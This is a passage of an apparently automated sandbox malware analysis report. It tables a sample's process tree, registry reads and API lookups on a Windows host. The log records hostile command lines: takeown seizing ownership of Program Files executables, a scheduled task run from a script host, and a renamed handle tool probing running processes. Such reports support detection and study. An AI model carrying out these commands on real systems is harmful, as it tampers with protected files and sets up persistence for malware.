| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75ea0db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x75ea5a20 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2019-04-17 10:42:20 (UTC) |
|
1 | |
| Get Time | type = Performance Ctr, time = 29283952811 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #174: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #174 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:53, Reason: Child Process |
| Unmonitor | End Time: 00:03:58, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x10a8 |
| Parent PID | 0x13fc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F78
0x
570
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #175: cmd.exe
52
0
| Information | Value |
|---|---|
| ID | #175 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:53, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:32 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1100 |
| Parent PID | 0x11dc (c:\windows\syswow64\wscript.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1364
0x
384
|
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
4 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\schtasks.exe | os_pid = 0x1350, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (13)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
4 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #176: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #176 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Mail\wabmig.exe" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:54, Reason: Child Process |
| Unmonitor | End Time: 00:03:58, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x490 |
| Parent PID | 0x13c4 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
13BC
0x
EE8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #178: mxkefu6a64.exe
2717
0
| Information | Value |
|---|---|
| ID | #178 |
| File Name | c:\users\fd1hvy\appdata\local\temp\mxkefu6a64.exe |
| Command Line | mxkeFu6a.exe -accepteula "vt mapping.exe" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:55, Reason: Child Process |
| Unmonitor | End Time: 00:04:17, Reason: Self Terminated |
| Monitor Duration | 00:00:22 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x13e0 |
| Parent PID | 0x10c4 (c:\users\fd1hvy\desktop\mxkefu6a.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1244
0x
548
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| mxkefu6a64.exe | 0x140000000 | 0x140045FFF | Process Termination | - | 64-bit | - |
|
|
|
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | \\.\PROCEXP152 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
2 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Process (146)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\system32\conhost.exe | type = PROCESS_BASIC_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
6 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
6 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_DUP_HANDLE |
|
2 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_DUP_HANDLE |
|
1 | |
| Open | System | desired_access = PROCESS_DUP_HANDLE |
|
5 | |
| Open | System | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\smss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wininit.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\csrss.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\winlogon.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\services.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\lsass.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\fontdrvhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\fontdrvhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\dwm.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\spoolsv.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\audiodg.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sihost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\common files\microsoft shared\clicktorun\officeclicktorun.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\securityhealthservice.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy\shellexperiencehost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy\searchui.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\runtimebroker.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\devicecensus.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows mail\entering.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\reference assemblies\anne measurement nut.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\msbuild\marilyn_becoming_editors.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\internet explorer\divorce mode twelve.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\unp\convertible-suicide-construction.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\internet explorer\mas.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\flashing_gcc_little.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows portable devices\americannumberssubstance.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\microsoft office\stupid-jeffrey-investors.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\successfully.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\rempl\does.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows mail\chocolate.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows media player\gnu.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows photo viewer\superbguilty.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\reference assemblies\daddy.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files\windows security\vt mapping.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\adobe\primarily-walk.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windowspowershell\hungary.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows media player\maternity.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\program files (x86)\windows mail\telephony_assumption_pharmacies.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\svchost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\fd1hvy\desktop\m.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\compattelrunner.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\fd1hvy\desktop\nwqzqdpd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\servicing\trustedinstaller.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\sppsvc.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\fd1hvy\desktop\mxkefu6a.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\taskhostw.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\wbem\wmiprvse.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\apphostregistrationverifier.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\users\fd1hvy\desktop\mxkefu6a.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cacls.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\system32\conhost.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\takeown.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\syswow64\cmd.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 |
Module (68)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ff92fdd0000 |
|
2 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x7ff931f40000 |
|
15 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\fd1hvy\appdata\local\temp\mxkefu6a64.exe, file_name_orig = C:\Users\FD1HVy\AppData\Local\Temp\mxkeFu6a64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ff92fdee1a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ff92fdee4e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ff92fde4710 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ff92fdebcd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ff92fdf1fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ff92fdf1f10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ff92fdf1f70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ff92fdee1e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ff92fdeb200 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ff931f83770 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ff931f80f10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ff931f809e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ff92fdee6e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ff931f80ff0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ff931f808e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ff931fe6fa0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ff931fc51c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ff931fe99c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ff92fdee2c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ff92fe06b80 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ff92f228b70 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ff92fe06d50 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ff92fde8f30 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ff92fe06e90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ff92fdec1d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ff92fe070a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ff92fdee3b0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ff92fe071d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ff92fde62d0 |
|
1 | |
